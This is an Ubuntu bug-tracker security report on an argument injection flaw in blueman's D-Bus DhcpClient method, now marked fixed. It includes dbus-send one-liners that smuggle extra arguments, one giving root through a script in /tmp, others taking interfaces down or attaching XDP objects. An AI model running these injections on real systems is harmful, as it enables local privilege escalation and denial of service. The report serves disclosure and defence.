Argument Injection leads to Local Privilege Escalation
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
blueman (Ubuntu) |
Fix Released
|
Undecided
|
Unassigned | ||
Xenial |
Fix Released
|
Undecided
|
Unassigned | ||
Bionic |
Fix Released
|
Undecided
|
Unassigned | ||
Focal |
Fix Released
|
Undecided
|
Unassigned | ||
Groovy |
Fix Released
|
Undecided
|
Unassigned |
Bug Description
Hi,
The DhcpClient method of the d-bus interface to blueman-mechanism is prone to an argument injection vulnerability. On systems where the isc-dhcp-client package is removed and the dhcpcd package installed, this leads to Local Privilege Escalation to root from any unprivileged user. See attached python script for a working exploit. Or use this oneliner with a shellscript "/tmp/eye":
dbus-send --print-reply --system --dest=
/org/blueman/
string:"-c/tmp/eye"
This happens because the argument is not sanitized before being used as an argument to dhcpcd.
Also on default installations with isc-dhcp-client installed, this can lead to DoS attacks by bringing any interface down as follows:
dbus-send --print-reply --system --dest=
/org/blueman/
string:"ens33 down al"
Or allows users to attach XDP objects to an interface:
dbus-send --print-reply --system --dest=
/org/blueman/
string:"ens33 down al"
dbus-send --print-reply --system --dest=
/org/blueman/
string:"ens33 name a"
dbus-send --print-reply --system --dest=
/org/blueman/
string:"a xdp o /tmp/o"
This both happens because the argument is passed to "ip link" unsanitized.
The fix would be to test if the argument is a valid interface name. But it might also need to check if the user is authorized to alter the given interface. Currently even a call with just the argument "ens33" will allow any unprivileged user to spawn a dhclient process on that interface.
Description: Ubuntu 20.04.1 LTS
Release: 20.04
blueman:
Installed: 2.1.2-1
Candidate: 2.1.2-1
Version table:
*** 2.1.2-1 500
500 http://
100 /var/lib/
Kind regards,
Vaisha Bernard
EYE Control B.V.
CVE References
Changed in blueman (Ubuntu): | |
status: | New → Fix Released |
Changed in blueman (Ubuntu Xenial): | |
status: | New → Fix Released |
Changed in blueman (Ubuntu Bionic): | |
status: | New → Fix Released |
Changed in blueman (Ubuntu Focal): | |
status: | New → Fix Released |
Changed in blueman (Ubuntu Groovy): | |
status: | New → Fix Released |
information type: | Private Security → Public Security |
Hello Vaisha,
Thank you for the report!
Have you reported this issue to upstream? If not, we encourage you to
report it and keep us in the loop if possible.
Thank you,
Avital